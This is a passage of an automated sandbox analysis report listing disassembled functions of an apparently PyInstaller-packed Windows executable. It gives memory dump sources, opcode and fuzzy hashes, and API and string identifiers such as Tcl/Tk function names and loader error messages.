                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                              • Instruction ID: 3347d0aac9943767dd3f499272287ebc2bb2a1c446a27ab3f70d0b640e606901
                                                              • Opcode Fuzzy Hash: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                              • Instruction Fuzzy Hash: C4B16A72A08B8685E765DF29C05423C3BA0E749B4CF280135EB6E873E5EF39D851C795
                                                              Function 00007FF6FB1FD880 Relevance: .2, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                              • Instruction ID: 9234e63d3a26116fd54151b0599d280e5f74aec7cf036e69418c83459bd626e6
                                                              • Opcode Fuzzy Hash: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                              • Instruction Fuzzy Hash: BF81A272F0C68646E774CF29944037A6691FB8A7D8F144235DAAD83BE9EE3DD540CB40
                                                              Function 00007FF6FB205728 Relevance: .2, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 1c784b8d4a055adf8560f3681b96f10fe234dcf2bfc90e734f7112d08b46dadd
                                                              • Instruction ID: a0cb36abf8b3366352c43b7ef4a9e7cff368397812cce18889cbec9463478555
                                                              • Opcode Fuzzy Hash: 1c784b8d4a055adf8560f3681b96f10fe234dcf2bfc90e734f7112d08b46dadd
                                                              • Instruction Fuzzy Hash: B461F522E0C28746FB64CA2885A463D7681AF497F0F145A39DA7DC6AF1FE7DE840C700
                                                              Function 00007FF6FB1F0C64 Relevance: .1, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                              • Instruction ID: 7f92172d1c9833e09b4247c4b61100c3547be7627dd171daa59a45069b000f64
                                                              • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                              • Instruction Fuzzy Hash: 60514176E18A5286E724CF29C04823927A1EB59B6CF244131CE6DD77E5EF3AE853C740
                                                              Function 00007FF6FB1F1484 Relevance: .1, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                              • Instruction ID: 396fd18c00bfea675f526f2136b9d4a47aa9c99689b6cf636bcfa70b86f54d10
                                                              • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                              • Instruction Fuzzy Hash: 94515176E1865386F724CB29C04422837A0EB5AB6CF284135DA5D977F4EF7AE862C740
                                                              Function 00007FF6FB1F1074 Relevance: .1, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                              • Instruction ID: b76cb370c470fc96ded75504d93db2112d2cecd612c9ddfca2986411f05b1b73
                                                              • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                              • Instruction Fuzzy Hash: F9516F76E18A5382F724CB29C04522833A1EB49B6CF244135CE6D977E4EF7AE863C740
                                                              Function 00007FF6FB1F0A60 Relevance: .1, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                              • Instruction ID: 493b0c6267a4f75bcfc85133cf270babf3ae36e099b9106e2ef8fddf9555a985
                                                              • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                              • Instruction Fuzzy Hash: 69517376E1965286E724CF29C05823937A1EB48B9CF284131CE5D977E9EF3AE843C740
                                                              Function 00007FF6FB1F1280 Relevance: .1, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                              • Instruction ID: 4bec9240e6e48f19c8dbb77c22a1efad53b44db0f42e6a0218366711aca1ea38
                                                              • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                              • Instruction Fuzzy Hash: 4F515F76E1865286F725CB29C04023867A1EB89B6CF244131CE5D977F8EF3AE963C740
                                                              Function 00007FF6FB1F0E70 Relevance: .1, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                              • Instruction ID: fea6e6b165e5be6268620b8559e7bfae76e1d73c87cc4df6d75ef11e40598d7b
                                                              • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                              • Instruction Fuzzy Hash: C7516C36E18A9286E724CF29C05863C27A2EB48B5CF254131DE5D977E5EF3AEC52C740
                                                              Function 00007FF6FB1F5040 Relevance: .1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                              • Instruction ID: 1c29553e26cb077fc62d840b994082de3f4889bcc78c5aa25b32f90bf85bcb21
                                                              • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                              • Instruction Fuzzy Hash: B041A352D4D78B84EB95C91805346B82A80AF2ABACD6852B4DDBDD33E7ED0D7987C240
                                                              Function 00007FF6FB1F91B0 Relevance: .1, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                              • String ID:
                                                              • API String ID: 588628887-0
                                                              • Opcode ID: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
                                                              • Instruction ID: e888a8199714cb3c932029ec4587c1acaff8f4785362eed63bd30ef97c2fd031
                                                              • Opcode Fuzzy Hash: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
                                                              • Instruction Fuzzy Hash: 1F41C262B14A5682EF48DF2ADA1417973A5FB8CFD4B099436DE1DD7BA8EE3DD0418300
                                                              Function 00007FF6FB1F73F4 Relevance: .1, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
                                                              • Instruction ID: ae8ad5c97bb5464c5e266cba4ba9e64af3d46362b7ea698ca6aa30f4ee6d02e6
                                                              • Opcode Fuzzy Hash: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
                                                              • Instruction Fuzzy Hash: CF318032F19B8341E724DB25648013E7A95AB88B94F144238EAAD93BE5EF7CD012C704
                                                              Function 00007FF6FB208880 Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                              • Instruction ID: 648b8d712d351e1a6074162570167708ac3d486c305072b3993aeb98fe60fb98
                                                              • Opcode Fuzzy Hash: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                              • Instruction Fuzzy Hash: 6BF068717286968EEB948F29A50263977D0F70C3C0F80D039F59DC3B54DA7C90508F04
                                                              Function 00007FF6FB1EC62C Relevance: .0, Instructions: 2COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                              • Instruction ID: 7c3e44c70bb5d2cc4f23ce742997cf9f11ac162c274fc72e2286782315153f7e
                                                              • Opcode Fuzzy Hash: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                              • Instruction Fuzzy Hash: A4A00125918827D4EB588B04A9A413A6621BB58744B402031D02EC19F0AF2CA8018310
                                                              Function 00007FF6FB1E6EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                              • API String ID: 190572456-3427451314
                                                              • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                              • Instruction ID: 2ea597ca4e0d9f415ebdc688b2cc56dbad77a80652fe467aaab850adfbfd1a4a
                                                              • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                              • Instruction Fuzzy Hash: 20E17268E1AB4395FB55DB14AAA41B863A5AF1C7D4F946436C83EC26F4FF3CB5488300
                                                              Function 00007FF6FB1E77D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FF6FB1E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FB1E3FA4,00000000,00007FF6FB1E1925), ref: 00007FF6FB1E86E9
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6FB1E7C97,?,?,FFFFFFFF,00007FF6FB1E3834), ref: 00007FF6FB1E782C
                                                                • Part of subcall function 00007FF6FB1E26C0: MessageBoxW.USER32 ref: 00007FF6FB1E2736
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                              • API String ID: 1662231829-930877121
                                                              • Opcode ID: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
                                                              • Instruction ID: 2a2c100b0747b2f2dabfa6ddf9d6b2e70d0fd2179999a184dedd6c9b8e97e886
                                                              • Opcode Fuzzy Hash: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
                                                              • Instruction Fuzzy Hash: 33416F11F2964381FB60EB24E9616BE6251AF9C7C8F545031DA6EC2AF9FE6CF108C740
                                                              Function 00007FF6FB1E20F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                              • String ID: P%
                                                              • API String ID: 2147705588-2959514604
                                                              • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                              • Instruction ID: 3dc3369830e126535fdb4c2228ed0b968f663e87a8ca85238e0f76eaa7092272
                                                              • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                              • Instruction Fuzzy Hash: 5C51E7266147A286D7349F22B4681BEB7A1F798BA5F004121EBDF83794EF3CD145CB10
                                                              Function 00007FF6FB1F55A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
